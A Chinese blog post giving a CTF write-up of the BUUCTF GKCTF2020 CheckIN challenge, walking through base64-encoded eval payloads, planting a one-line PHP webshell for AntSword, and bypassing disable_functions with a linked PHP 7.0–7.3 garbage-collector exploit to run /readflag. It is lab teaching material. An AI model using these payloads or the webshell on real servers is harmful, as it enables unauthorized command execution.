NineOnee

导航

 

php7.0-7.3的bypass disable_function一把梭

前言

  • 环境:buuctf中[GKCTF2020]CheckIN
  • 知识点:linux权限,bypass disable_function
  • 参考:wp1

做题

源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

传进去Ginkgo 参数会被base64解码,然后执行eval函数

system('ls');=>?Ginkgo=c3lzdGVtKCdscycpOw== ?!!没有回显结果,是不是禁用了system函数呢

phpinfo();=>?Ginkgo=cGhwaW5mbygpOw== ,成功返回phpinfo

查看disable_function

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,

可以看到禁用了system,exec等函数,所以无法执行system

print_r(scandir('/'));=>?Ginkgo=cHJpbnRfcihzY2FuZGlyKCcvJykpOw== ,回显有flag,和readflag两个有关flag的

readfile('/flag')=>?Ginkgo=cmVhZGZpbGUoJy9mbGFnJyk7 ,?!!怎么没有回显,奇怪

试试 readfile('/readflag')=>?Ginkgo=cmVhZGZpbGUoJy9yZWFkZmxhZycpOw== ,有回显文件,但是是乱码

用蚁剑连接看看

@eval($_POST[hacker]); =>?Ginkgo=QGV2YWwoJF9QT1NUW2hhY2tlcl0pOw== 密码hacker连上蚁剑

linux权限

3位数分别对应user,group,other

rwx表示7 ,对应2进制111

flag的权限是0700 ,身为other的我们不能读写执行,所以打开的flag文件为空,那要怎样才能读取flag文件了

发现readflag的权限为6755


所以other即我们的权限是只许读和执行,看来是要通过执行readflag这个命令,来读取flag文件,但是所有有关linux命令执行的函数都被禁用了,如:system,exec等函数,那我们要怎样执行这个命令呢?

通过phpinfo,我们知道php版本为7.3.18,这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

pwn里的内容就是我们要执行的命令,也可以是ls等linux命令


我们可以在tmp这个文件里上传文件exploit.php

然后在index.php里

include('/tmp/exploit.php'); =>?Ginkgo=aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

得到flag

posted on 2020-12-07 22:34  NineOne_E  阅读(491)  评论(0编辑  收藏  举报